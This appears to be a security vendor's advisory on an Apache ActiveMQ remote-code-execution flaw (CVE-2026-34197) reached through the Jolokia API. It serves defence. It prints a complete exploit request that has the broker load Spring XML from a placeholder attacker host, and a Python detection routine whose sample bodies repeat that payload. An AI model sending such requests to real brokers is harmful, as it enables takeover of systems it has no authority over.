This vulnerability (CVE-2026-34197) is a Remote Code Execution vulnerability discovered in Apache ActiveMQ. An attacker constructs, via the VM transport method, a server address that returns malicious XML code and sends it to the Apache ActiveMQ /api/jolokia endpoint for execution. A security patch for this vulnerability was released on March 30, 2026, and AIWAF products are scheduled to address it through the "2328 / Apache ActiveMQ Remote Code Execution" pattern, which will be added in the pattern update for May 2026.
1. Overview
Apache ActiveMQ is an open-source message broker that supports JMS (Java Message Service) and is primarily used to handle asynchronous message transmission between applications and data integration between systems. This report provides a detailed analysis of the CVE-2026-34197 vulnerability identified in the service.
Source: https://www.helpnetsecurity.com/2026/04/09/apache-activemq-rce-vulnerability-cve-2026-34197-claude/
2. Attack Type
The CVE-2026-34197 vulnerability is a Remote Code Execution (RCE) flaw discovered in Apache ActiveMQ. It has been identified that attackers can exploit this vulnerability by transmitting a server address that returns a malicious Spring XML response, thereby tricking the system into executing malicious files.
ActiveMQ supports the VM transport method (utilized via the vm:// format), which is a transport mechanism designed to embed
a broker directly inside an application. When a vm:// URL references a non-existent broker, ActiveMQ by default creates a new broker
instance immediately. During this process, ActiveMQ accepts a brokerConfig parameter that can include a remote URL controlled by an attacker.
Consequently, the newly initialized broker executes the malicious Spring XML configuration file hosted at the attacker's server URL,
leading to arbitrary remote command execution.
POST /api/jolokia/ HTTP/1.1
Content-Length: 225
Content-Type: application/json
Host: www.test.com
User-Agent: HTTPie

{
  "type": "exec",
  "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
  "operation": "addNetworkConnector",
  "arguments": ["static:(vm://rce?brokerConfig=xbean:http://ATTACKER:8888/payload.xml)"]
}
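The following is an added detection example for the request shape shown above; it is not AIWAF's "2328" pattern and not Apache ActiveMQ project code. It inspects a Jolokia POST body (including Jolokia's documented bulk form, a JSON array of requests) and flags "exec" calls to addNetworkConnector whose connector URI embeds a vm:// transport with a brokerConfig pointing at a remote xbean resource; the sample bodies are constructed, and the operation-name and remote-scheme handling are assumptions about what a defender would want to normalise.

```python
import json
import re

# Flags a vm:// transport URI carrying brokerConfig=xbean:<remote URL>, the
# combination described in the text above (schemes listed are an assumption).
VM_REMOTE_BROKERCONFIG = re.compile(
    r"vm://[^\s)]*[?&]brokerConfig=xbean:(?:https?|ftp)://", re.IGNORECASE)

def _jolokia_requests(body: str) -> list:
    """Return each request object; a Jolokia bulk request is a JSON array."""
    data = json.loads(body)
    items = data if isinstance(data, list) else [data]
    return [item for item in items if isinstance(item, dict)]

def _strings(value):
    """Yield every string nested anywhere inside a JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, (list, dict)):
        for v in (value.values() if isinstance(value, dict) else value):
            yield from _strings(v)

def find_cve_2026_34197(body: str) -> list:
    """Return one finding dict per suspicious request in a Jolokia POST body."""
    try:
        requests = _jolokia_requests(body)
    except ValueError:  # not JSON: nothing for this check to inspect
        return []
    findings = []
    for req in requests:
        # Jolokia may append the signature, e.g. "addNetworkConnector(java.lang.String)"
        op = str(req.get("operation", "")).split("(")[0].lower()
        if str(req.get("type", "")).lower() != "exec" or op != "addnetworkconnector":
            continue
        for arg in _strings(req.get("arguments", [])):
            if VM_REMOTE_BROKERCONFIG.search(arg):
                findings.append({"mbean": req.get("mbean"), "uri": arg})
    return findings

# Constructed sample bodies (not captured traffic): the request shown above, a
# bulk body combining that call with a harmless read, and a benign tcp:// connector.
SUSPICIOUS = json.dumps({"type": "exec",
    "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
    "operation": "addNetworkConnector",
    "arguments": ["static:(vm://rce?brokerConfig=xbean:http://ATTACKER:8888/payload.xml)"]})
BULK = json.dumps([{"type": "read", "mbean": "java.lang:type=Memory"}, json.loads(SUSPICIOUS)])
BENIGN = json.dumps({"type": "exec",
    "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
    "operation": "addNetworkConnector", "arguments": ["static:(tcp://10.0.0.5:61616)"]})
```

A WAF or reverse proxy applying this check should run it on the decoded request body, since only the connector URI string, not the HTTP framing, identifies the call.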
3. Mitigation and Countermeasures
Apache ActiveMQ became aware of the vulnerability in March 2026 and released a security patch (version 6.2.3) on March 30, followed by an official security advisory and vulnerability disclosure on April 6. Therefore, organizations utilizing the affected service can effectively mitigate this vulnerability by applying the relevant security patch.
Our AIWAF products are scheduled to address and defend against this vulnerability through the pattern
"2328 / Apache ActiveMQ Remote Code Execution," which will be deployed in the upcoming May 2026 pattern update.
Source: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt
4. Conclusion
Apache ActiveMQ is an open-source message broker. Given its open-source nature, it is widely adopted across various environments, which significantly amplifies the impact of the CVE-2026-34197 vulnerability. Furthermore, since this vulnerability had remained latent within the system for approximately 13 years, there is a high probability that it could be immediately exploited for attacks.
Therefore, organizations utilizing this service must promptly apply the relevant security patches.
Our Threat Analysis (TA) team is continuously monitoring vulnerabilities emerging from Apache ActiveMQ and remains committed to
responding swiftly to any related security flaws discovered in the future.
5. References
- https://nvd.nist.gov/vuln/detail/CVE-2026-34197
- https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/